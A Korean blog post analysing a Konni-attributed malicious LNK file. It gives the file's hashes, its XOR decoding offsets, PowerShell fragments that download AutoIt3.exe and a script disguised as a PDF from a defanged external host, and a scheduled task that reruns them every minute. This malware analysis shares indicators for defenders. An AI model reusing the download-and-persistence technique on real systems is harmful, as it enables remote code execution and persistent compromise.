꿈을꾸는 파랑새

오늘은 북한 해킹 단체 코니(Konni)에서 만든 악성코드인 0a6934a3_.lnk 에 대해 분석을 해보겠습니다.
파일명:0a6934a3_.lnk
사이즈: 1 MB
MD5: 7b4fc4d03238d20938a8c1a763028237
SHA-1: 5fd6f20214f3fd1e424e453d2a5e5d78775b130e
SHA-256: 6afdbaf73028607b49f725467bf5dce4bb9f8c7b7095e43f09ecfce94b450fd4
악성코드 분석
1.LNK 내부의 오프셋 0x18A8~0xC1A71 바이트를 읽고 XOR 0x7F로 복호화
LNK 내부에 숨겨진 실행용 페이로드
2.파일 내부에서 페이로드 읽기
0x000018A8:6,312:LNK 내부 페이로드 시작 오프셋
0x000C1A71:793,201:읽어올 페이로드 크기

악성코드 실행시 화면
악성코드 실행시 화면

0x000C5C0E:809,998:대상 LNK 전체 크기
내부의 0x18A8 위치부터 0xC1A71 바이트를 읽어들임
3.XOR 복호화 방식
slSize가 0x01이므로 byRem 은 항상 0
3.복호화된 파일 저장명
$te8iducm 은 LNK 파일명 또는 경로
length - 5까지 자르고 보통 .lnk 확장자를 제거하는 목적

악성코드 에 포함된 PowerShell 코드
악성코드 에 포함된 PowerShell 코드

4.외부 파일 다운로드
hxxps://theboxflow(.)com/wp-admin/maint/thermometer/?TEd=melWM0' -OutFile 'AutoIt3(.)exe
hxxps://theboxflow(.)com/wp-admin/maint/thermometer/?YsG=tRnlL1' -OutFile 'pJtsLyQ(.)pdf
다운로드 위치
C:\Users\Public\Videos\
AutoIt3.exe
pJtsLyQ.pdf
5.예약 작업 지속성
시작 시점: 현재 시각+1분
반복 간격: 1분마다 
반복 기간: 365일
실행 권한: 현재 사용자
RunLevel:Limited
LogonType:Interactive
작업명: pJtsLyQ
예약 작업이 등록 실행
Task Name:pJtsLyQ
Execute:C:\Users\Public\Videos\AutoIt3.exe
Argument:C:\Users\Public\Videos\pJtsLyQ.pdf

작업 스케줄러에 등록된 명령어
작업 스케줄러에 등록된 명령어

Interval:1분 마다
주기: 365일
일단 정확한 분석을 하려면 AutoIt3을 다운로드 해서 분석을 해야 하지만 해당 파일들은 사이트에서 제거되었기 때문에 더는 진행이 안 됩니다.
일단 어디를 노린 것인지 모르겠지만, 아무튼 매번 조심해서 기본 수식을 지키면서 사용을 하는 습관을 가져야 합니다.

공유하기

facebook twitter kakaoTalk kakaostory naver band